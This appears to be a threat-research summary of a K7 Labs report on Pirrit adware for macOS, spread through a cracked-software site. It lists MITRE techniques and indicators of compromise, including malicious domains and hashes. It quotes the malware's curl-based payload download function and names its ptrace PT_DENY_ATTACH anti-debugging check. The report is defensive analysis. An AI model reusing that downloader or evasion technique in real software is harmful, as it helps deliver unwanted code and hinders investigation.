Threat Research

macOS Pirrit Adware – K7 Labs

K7computing

K7 Labs uncovered a macOS adware campaign centered on a cracked software website that disguised Pirrit as legitimate software. The infection chain uses a two-step download flow, unsigned binaries, and anti-analysis techniques to evade detection, ultimately delivering adware via a launcher and fake installers. #PirritAdware #macOS #crackmac

Keypoints

  • Pirrit adware is distributed via a cracked macOS software site, tricking users into downloading unwanted software.
  • The site offers two download options and directs users to install OperaGX to obtain the intended program.
  • The payload is an unsigned Mach-O binary downloaded from a remote URL and executed via a scripted chain.
  • Anti-analysis and anti-VM techniques, including ptrace-based checks, are used to hinder forensic debugging.
  • Users should avoid pirated software and use reputable security products to mitigate this threat.

MITRE Techniques

  • [T1189] Drive-by Compromise – The attackers used a cracked software site to lure Mac users into downloading Pirrit adware. ‘a website that was ostensibly providing cracked software for macOS’
  • [T1059.004] Command and Scripting Interpreter – The malware uses a shell script to perform actions such as downloading and executing payloads. ‘When it is executed, it executes the following shell command and downloads an application.’
  • [T1105] Ingress Tool Transfer – It downloads a payload from a remote URL and unarchives it. ‘download(){ local -r url=”${1}”;local -r tmp_dir=”${2}”;local -r path=”${tmp_dir}/$(uuidgen)”;if output=”$(curl -kLSs -m “30” -o “${path}” “${url}” 2>&1)”;then echo “${path}”;else return 1;fi }’
  • [T1497] Virtualization/Sandbox Evasion – Anti-analysis and VM checks including using ptrace PT_DENY_ATTACH. ‘anti-analysis. It is done through calling ptrace with the flag PT_DENY_ATTACH.’
  • [T1204] User Execution – The site asks the user to download and install OperaGX to download the application. ‘It asks the user to download and install the OperaGX browser to download the application (i.e Adobe Acrobat Pro in this case).’

Indicators of Compromise

  • [Hash] context – 0C42838DA01CCC34E08FE7300D8913B9, F74F2F61E9924A139E04248A6C6A190E
  • [Domain] context – crack-mac.com, Vexfile.com
  • [File name] context – Adobe_Acrobat_2023_Setup.zip.dmg, Installer.app.zip

Read more: https://labs.k7computing.com/index.php/macos-pirrit-adware/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint